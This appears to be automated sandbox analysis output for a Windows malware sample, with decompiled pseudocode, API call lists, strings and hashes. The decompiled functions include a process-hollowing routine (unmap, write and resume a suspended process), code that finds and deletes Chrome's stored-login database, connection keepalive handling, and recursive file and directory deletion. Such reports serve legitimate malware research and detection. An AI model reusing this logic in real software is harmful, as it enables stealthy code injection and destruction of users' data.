                                          • Opcode ID: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                                          • Instruction ID: 59879eeb23424d9b9582fbd1b4132700e7662ed198339718a96ed2a8ede2f5f3
                                          • Opcode Fuzzy Hash: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                                          • Instruction Fuzzy Hash: 7A51EF7190011EABCB15EBA1DD4AEDEB77CAF54308F1044B6B506B2051EE789F4D8F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E0040D477() {
                                          				void* _t63;
                                          				void* _t64;
                                          				void _t76;
                                          				void* _t77;
                                          				signed int _t79;
                                          				intOrPtr _t90;
                                          				CONTEXT* _t98;
                                          				signed int _t100;
                                          				void* _t103;
                                          				long _t112;
                                          				intOrPtr* _t117;
                                          				void* _t118;
                                          				void* _t120;
                                          
                                          				L0040FCDE();
                                          				 *((intOrPtr*)(_t118 - 0x10)) = _t120 - 0x7c;
                                          				 *(_t118 - 4) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x84)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                          				_t63 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x80) = _t63;
                                          				if( *_t63 != 0x5a4d) {
                                          					L12:
                                          					 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
                                          					_t64 = 0;
                                          				} else {
                                          					_t117 =  *((intOrPtr*)(_t63 + 0x3c)) + _t63;
                                          					 *((intOrPtr*)(_t118 - 0x14)) = _t117;
                                          					if( *_t117 != 0x4550) {
                                          						goto L12;
                                          					} else {
                                          						_t100 = 0x11;
                                          						memset(_t118 - 0x5c, 0, _t100 << 2);
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_push(_t118 - 0x7c);
                                          						_push(_t118 - 0x5c);
                                          						_push(0);
                                          						_push(0);
                                          						_t112 = 4;
                                          						if(CreateProcessA(0,  *(_t118 + 8), 0, 0, 0, _t112, ??, ??, ??, ??) == 0) {
                                          							goto L12;
                                          						} else {
                                          							_t98 = VirtualAlloc(0, _t112, 0x1000, _t112);
                                          							 *(_t118 - 0x6c) = _t98;
                                          							_t98->ContextFlags = 0x10007;
                                          							if(GetThreadContext( *(_t118 - 0x78), _t98) == 0) {
                                          								goto L12;
                                          							} else {
                                          								ReadProcessMemory( *(_t118 - 0x7c), _t98->Ebx + 8, _t118 - 0x18, _t112, 0);
                                          								_t76 =  *(_t118 - 0x18);
                                          								if(_t76 ==  *(_t117 + 0x34)) {
                                          									 *((intOrPtr*)(_t118 - 0x84))( *(_t118 - 0x7c), _t76);
                                          								}
                                          								_t77 = VirtualAllocEx( *(_t118 - 0x7c),  *(_t117 + 0x34),  *(_t117 + 0x50), 0x3000, 0x40);
                                          								 *(_t118 - 0x68) = _t77;
                                          								if(_t77 == 0) {
                                          									goto L12;
                                          								} else {
                                          									WriteProcessMemory( *(_t118 - 0x7c), _t77,  *(_t118 + 0xc),  *(_t117 + 0x54), 0);
                                          									_t79 = 0;
                                          									 *(_t118 - 0x60) = 0;
                                          									while(_t79 < ( *(_t117 + 6) & 0x0000ffff)) {
                                          										_t103 =  *(_t118 + 0xc);
                                          										_t90 =  *((intOrPtr*)(_t103 + 0x3c)) + (_t79 + _t79 * 4) * 8 + _t103 + 0xf8;
                                          										 *((intOrPtr*)(_t118 - 0x64)) = _t90;
                                          										WriteProcessMemory( *(_t118 - 0x7c),  *((intOrPtr*)(_t90 + 0xc)) +  *(_t118 - 0x68),  *((intOrPtr*)(_t90 + 0x14)) + _t103,  *(_t90 + 0x10), 0);
                                          										 *(_t118 - 0x60) =  *(_t118 - 0x60) + 1;
                                          										_t79 =  *(_t118 - 0x60);
                                          									}
                                          									WriteProcessMemory( *(_t118 - 0x7c), _t98->Ebx + 8, _t117 + 0x34, 4, 0);
                                          									_t98->Eax =  *((intOrPtr*)(_t117 + 0x28)) +  *(_t118 - 0x68);
                                          									SetThreadContext( *(_t118 - 0x78), _t98);
                                          									if(ResumeThread( *(_t118 - 0x78)) == 0xffffffff) {
                                          										goto L12;
                                          									} else {
                                          										_t64 = 1;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
                                          				return _t64;
                                          			}
















                                          0x0040d47c
                                          0x0040d487
                                          0x0040d48c
                                          0x0040d4a6
                                          0x0040d4ac
                                          0x0040d4af
                                          0x0040d4b7
                                          0x0040d612
                                          0x0040d612
                                          0x0040d616
                                          0x0040d4bd
                                          0x0040d4c0
                                          0x0040d4c2
                                          0x0040d4cb
                                          0x00000000
                                          0x0040d4d1
                                          0x0040d4d3
                                          0x0040d4d9
                                          0x0040d4de
                                          0x0040d4df
                                          0x0040d4e0
                                          0x0040d4e1
                                          0x0040d4e5
                                          0x0040d4e9
                                          0x0040d4ea
                                          0x0040d4eb
                                          0x0040d4ee
                                          0x0040d4ff
                                          0x00000000
                                          0x0040d505
                                          0x0040d513
                                          0x0040d515
                                          0x0040d518
                                          0x0040d52a
                                          0x00000000
                                          0x0040d530
                                          0x0040d544
                                          0x0040d54a
                                          0x0040d550
                                          0x0040d556
                                          0x0040d556
                                          0x0040d56c
                                          0x0040d572
                                          0x0040d577
                                          0x00000000
                                          0x0040d57d
                                          0x0040d58f
                                          0x0040d591
                                          0x0040d593
                                          0x0040d596
                                          0x0040d5a1
                                          0x0040d5aa
                                          0x0040d5b1
                                          0x0040d5c9
                                          0x0040d5cb
                                          0x0040d5ce
                                          0x0040d5ce
                                          0x0040d5e8
                                          0x0040d5f0
                                          0x0040d5fa
                                          0x0040d60c
                                          0x00000000
                                          0x0040d60e
                                          0x0040d60e
                                          0x0040d60e
                                          0x0040d60c
                                          0x0040d577
                                          0x0040d52a
                                          0x0040d4ff
                                          0x0040d4cb
                                          0x0040d61b
                                          0x0040d626

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 0040D47C
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000,74B5F560), ref: 0040D499
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040D4A0
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040D4F7
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040D50D
                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0040D522
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D544
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040D56C
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040D58F
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040D5C9
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D5E8
                                          • SetThreadContext.KERNEL32(?,00000000), ref: 0040D5FA
                                          • ResumeThread.KERNEL32(?), ref: 0040D603
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                          • String ID: NtUnmapViewOfSection$ntdll.dll
                                          • API String ID: 65594003-1050664331
                                          • Opcode ID: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                                          • Instruction ID: 491b69bf14096d3796cb56c0b3543e1f41dcebd31bc2b04dfda4688c6db47199
                                          • Opcode Fuzzy Hash: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                                          • Instruction Fuzzy Hash: C1515E71900208AFDB209FA4DC45FAEBBB9FF48314F10842AFA15E72A1D7759944DF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • getenv.MSVCRT ref: 00405637
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00405642
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040564D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405658
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00405661
                                          • DeleteFileA.KERNEL32(00000000), ref: 00405668
                                          • GetLastError.KERNEL32 ref: 00405672
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 00405693
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056A6
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004056CC
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056E1
                                          Strings
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040562C
                                          • UserProfile, xrefs: 00405632
                                          • [Chrome StoredLogins not found], xrefs: 0040568E
                                          • [Chrome StoredLogins found, cleared!], xrefs: 004056C7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 3740952235-1062637481
                                          • Opcode ID: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                                          • Instruction ID: 4f69eec6fecf3c2889a810bfc1713c7a18bd464deb3961be00d6ef52500a67c9
                                          • Opcode Fuzzy Hash: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                                          • Instruction Fuzzy Hash: F0116331640509ABD700ABE4DD1EAFE7778EB54305F504477E402F21D0EEB95E88CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00402832(void* __ecx) {
                                          				char _v5;
                                          				struct _SYSTEMTIME _v24;
                                          				char _v40;
                                          				void* _v56;
                                          				char* _t29;
                                          				char* _t30;
                                          				void* _t38;
                                          				intOrPtr _t46;
                                          
                                          				_t38 = __ecx;
                                          				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
                                          				if( *((intOrPtr*)(__ecx + 0x38)) <= 0) {
                                          					L3:
                                          					if( *((intOrPtr*)(_t38 + 0x35)) == 0) {
                                          						_t46 =  *0x415938; // 0x0
                                          						if(_t46 != 0) {
                                          							GetLocalTime( &_v24);
                                          							_t29 =  &_v5;
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [KeepAlive] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                          							_t30 =  &_v40;
                                          							L0040FC20();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                          							_t21 = printf(_t30);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          						E004021C7(_t21, _t38);
                                          					}
                                          					L7:
                                          					 *((char*)(_t38 + 0x34)) = 0;
                                          					 *((char*)(_t38 + 0x35)) = 0;
                                          					return 0;
                                          				}
                                          				while( *((intOrPtr*)(_t38 + 0x35)) == 0) {
                                          					Sleep(0x3e8);
                                          					 *(_t38 + 0x3c) =  *(_t38 + 0x3c) + 1;
                                          					_t21 =  *(_t38 + 0x3c);
                                          					if( *(_t38 + 0x3c) <  *((intOrPtr*)(_t38 + 0x38))) {
                                          						continue;
                                          					}
                                          					goto L3;
                                          				}
                                          				goto L7;
                                          			}











                                          0x0040283a
                                          0x00402841
                                          0x00402844
                                          0x00402865
                                          0x00402868
                                          0x0040286a
                                          0x00402870
                                          0x00402876
                                          0x00402893
                                          0x004028a1
                                          0x004028a8
                                          0x004028ac
                                          0x004028b6
                                          0x004028bd
                                          0x004028c9
                                          0x004028d2
                                          0x004028d2
                                          0x004028da
                                          0x004028da
                                          0x004028df
                                          0x004028df
                                          0x004028e2
                                          0x004028ea
                                          0x004028ea
                                          0x00402846
                                          0x00402854
                                          0x0040285a
                                          0x0040285d
                                          0x00402863
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402863
                                          0x00000000

                                          APIs
                                          • Sleep.KERNEL32(000003E8), ref: 00402854
                                          • GetLocalTime.KERNEL32(?), ref: 00402876
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 004028A1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004028AC
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004028B6
                                          • printf.MSVCRT ref: 004028BD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028C9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004028D2
                                          Strings
                                          • Timeout expired, resetting connection., xrefs: 00402896
                                          • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 0040289C
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                          • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                                          • API String ID: 2756237499-72633004
                                          • Opcode ID: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                                          • Instruction ID: 772636e3ebd337da963efdda9584c1e6191fd0daf56e0bc3e27ada7e64864670
                                          • Opcode Fuzzy Hash: 8a003b9b96387b9a977b2827803bf9a6b624b48ad5c8bb1a43ea3030722d3ccf
                                          • Instruction Fuzzy Hash: 03118B76941244AFC750EBE5DA898EFB7F8BE04300750457BF543E2590DAB8EE84C729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                          • malloc.MSVCRT ref: 00402248
                                          • recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                            • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00415A30,00000000), ref: 004022FC
                                            • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 00402314
                                            • Part of subcall function 004022EA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402323
                                            • Part of subcall function 004022EA: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040232D
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 00402346
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040234F
                                            • Part of subcall function 004022EA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415A60), ref: 0040236E
                                            • Part of subcall function 004022EA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040238E
                                            • Part of subcall function 004022EA: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415258,00410668), ref: 004023A6
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                            • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,73115DF0), ref: 004023CE
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                            • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                            • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                            • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                                            • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                                          • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                          • String ID:
                                          • API String ID: 2200674315-0
                                          • Opcode ID: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                                          • Instruction ID: efd5f749c13a253eb37fde81f2b1e2490532d806b03320675b530293b808823e
                                          • Opcode Fuzzy Hash: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                                          • Instruction Fuzzy Hash: B8211D3250050AAFCB11DBA0DE4DAEEB779FF54309F10407AF406A2190DBB59E49CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E0040F234(CHAR* _a4) {
                                          				signed char _v5;
                                          				void* _v12;
                                          				char _v272;
                                          				void _v532;
                                          				struct _WIN32_FIND_DATAA _v852;
                                          				CHAR* _t57;
                                          				void* _t58;
                                          				signed int _t86;
                                          				signed int _t87;
                                          				unsigned int _t89;
                                          				signed int _t90;
                                          				signed int _t96;
                                          				signed int _t99;
                                          				unsigned int _t105;
                                          				signed int _t106;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				unsigned int _t121;
                                          				signed int _t122;
                                          				signed int _t129;
                                          				signed int _t132;
                                          				unsigned int _t138;
                                          				signed int _t139;
                                          				signed int _t147;
                                          				signed int _t150;
                                          				signed int _t153;
                                          				void* _t207;
                                          				void* _t208;
                                          				void* _t209;
                                          				void* _t210;
                                          				void* _t211;
                                          				void* _t212;
                                          				void* _t213;
                                          				void* _t214;
                                          				void* _t222;
                                          				void* _t224;
                                          				void* _t226;
                                          
                                          				_t87 = _t86 | 0xffffffff;
                                          				asm("repne scasb");
                                          				_t89 =  !_t87;
                                          				_t207 = _a4 - _t89;
                                          				_t90 = _t89 >> 2;
                                          				memcpy(_t207 + _t90 + _t90, _t207, memcpy( &_v532, _t207, _t90 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t96 =  !_t87;
                                          				_t208 = "\\*" - _t96;
                                          				_t147 = _t96;
                                          				asm("repne scasb");
                                          				_t99 = _t147 >> 2;
                                          				memcpy( &_v532 - 1, _t208, _t99 << 2);
                                          				memcpy(_t208 + _t99 + _t99, _t208, _t147 & 0x00000003);
                                          				asm("repne scasb");
                                          				_t105 =  !_t87;
                                          				_t209 = _a4 - _t105;
                                          				_t106 = _t105 >> 2;
                                          				memcpy(_t209 + _t106 + _t106, _t209, memcpy( &_v272, _t209, _t106 << 2) & 0x00000003);
                                          				asm("repne scasb");
                                          				_t112 =  !_t87;
                                          				_t210 = 0x4108cc - _t112;
                                          				_t150 = _t112;
                                          				asm("repne scasb");
                                          				_t115 = _t150 >> 2;
                                          				memcpy( &_v272 - 1, _t210, _t115 << 2);
                                          				_t57 = memcpy(_t210 + _t115 + _t115, _t210, _t150 & 0x00000003);
                                          				_t222 = _t214 + 0x60;
                                          				_t58 = FindFirstFileA(_t57,  &_v852);
                                          				_v12 = _t58;
                                          				if(_t58 == _t87) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				asm("repne scasb");
                                          				_t121 =  !_t87;
                                          				_v5 = 1;
                                          				_t211 =  &_v272 - _t121;
                                          				_t122 = _t121 >> 2;
                                          				memcpy(_t211 + _t122 + _t122, _t211, memcpy( &_v532, _t211, _t122 << 2) & 0x00000003);
                                          				_t224 = _t222 + 0x18;
                                          				do {
                                          					if(FindNextFileA(_v12,  &_v852) == 0) {
                                          						if(GetLastError() != 0x12) {
                                          							L17:
                                          							FindClose(_v12);
                                          							goto L18;
                                          						}
                                          						_v5 = _v5 & 0x00000000;
                                          						goto L14;
                                          					}
                                          					if(E0040F1C0( &(_v852.cFileName)) != 0) {
                                          						goto L14;
                                          					}
                                          					asm("repne scasb");
                                          					_t129 =  !_t87;
                                          					_t212 =  &(_v852.cFileName) - _t129;
                                          					_t153 = _t129;
                                          					asm("repne scasb");
                                          					_t132 = _t153 >> 2;
                                          					memcpy( &_v272 - 1, _t212, _t132 << 2);
                                          					memcpy(_t212 + _t132 + _t132, _t212, _t153 & 0x00000003);
                                          					_t226 = _t224 + 0x18;
                                          					if((_v852.dwFileAttributes & 0x00000010) == 0) {
                                          						if((_v852.dwFileAttributes & 0x00000001) != 0) {
                                          							SetFileAttributesA( &_v272, 0x80);
                                          						}
                                          						if(DeleteFileA( &_v272) == 0) {
                                          							goto L17;
                                          						} else {
                                          							L7:
                                          							asm("repne scasb");
                                          							_t138 =  !_t87;
                                          							_t213 =  &_v532 - _t138;
                                          							_t139 = _t138 >> 2;
                                          							memcpy(_t213 + _t139 + _t139, _t213, memcpy( &_v272, _t213, _t139 << 2) & 0x00000003);
                                          							_t224 = _t226 + 0x18;
                                          							goto L14;
                                          						}
                                          					}
                                          					if(E0040F234( &_v272) == 0) {
                                          						goto L17;
                                          					}
                                          					RemoveDirectoryA( &_v272);
                                          					goto L7;
                                          					L14:
                                          				} while (_v5 != 0);
                                          				FindClose(_v12);
                                          				return RemoveDirectoryA(_a4);
                                          			}








































                                          0x0040f23f
                                          0x0040f250
                                          0x0040f252
                                          0x0040f258
                                          0x0040f25a
                                          0x0040f26e
                                          0x0040f277
                                          0x0040f279
                                          0x0040f27d
                                          0x0040f281
                                          0x0040f285
                                          0x0040f28a
                                          0x0040f28d
                                          0x0040f29a
                                          0x0040f2a1
                                          0x0040f2a3
                                          0x0040f2a9
                                          0x0040f2b3
                                          0x0040f2bf
                                          0x0040f2c8
                                          0x0040f2ca
                                          0x0040f2ce
                                          0x0040f2d2
                                          0x0040f2d6
                                          0x0040f2db
                                          0x0040f2de
                                          0x0040f2f2
                                          0x0040f2f2
                                          0x0040f2f5
                                          0x0040f2fd
                                          0x0040f300
                                          0x0040f448
                                          0x00000000
                                          0x0040f448
                                          0x0040f316
                                          0x0040f318
                                          0x0040f31c
                                          0x0040f322
                                          0x0040f326
                                          0x0040f330
                                          0x0040f330
                                          0x0040f332
                                          0x0040f344
                                          0x0040f418
                                          0x0040f43f
                                          0x0040f442
                                          0x00000000
                                          0x0040f442
                                          0x0040f41a
                                          0x00000000
                                          0x0040f41a
                                          0x0040f359
                                          0x00000000
                                          0x00000000
                                          0x0040f367
                                          0x0040f369
                                          0x0040f373
                                          0x0040f377
                                          0x0040f37b
                                          0x0040f380
                                          0x0040f383
                                          0x0040f391
                                          0x0040f391
                                          0x0040f393
                                          0x0040f3e8
                                          0x0040f3f6
                                          0x0040f3f6
                                          0x0040f40b
                                          0x00000000
                                          0x0040f40d
                                          0x0040f3b7
                                          0x0040f3c7
                                          0x0040f3c9
                                          0x0040f3cf
                                          0x0040f3d3
                                          0x0040f3dd
                                          0x0040f3dd
                                          0x00000000
                                          0x0040f3dd
                                          0x0040f40b
                                          0x0040f3a4
                                          0x00000000
                                          0x00000000
                                          0x0040f3b1
                                          0x00000000
                                          0x0040f41e
                                          0x0040f41e
                                          0x0040f42b
                                          0x00000000

                                          APIs
                                          • FindFirstFileA.KERNEL32(?,?,00415918,00410668,74B5FBA0), ref: 0040F2F5
                                          • FindNextFileA.KERNEL32(0040E4BC,?), ref: 0040F33C
                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F3F6
                                          • DeleteFileA.KERNEL32(?), ref: 0040F403
                                            • Part of subcall function 0040F234: RemoveDirectoryA.KERNEL32(?), ref: 0040F3B1
                                          • GetLastError.KERNEL32 ref: 0040F40F
                                          • FindClose.KERNEL32(0040E4BC), ref: 0040F42B
                                          • RemoveDirectoryA.KERNEL32(0040E4BC), ref: 0040F434
                                          • FindClose.KERNEL32(0040E4BC), ref: 0040F442
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                                          • Instruction ID: c9d715fef9de8b24144a52c82442ab3d42063f8e50258a23890eccb11d7ae604
                                          • Opcode Fuzzy Hash: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                                          • Instruction Fuzzy Hash: 5151B636A0050C4BCF28CA749C446EEB7A6BBD4310F5485B9E806E76D0DEB99E8D8A44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

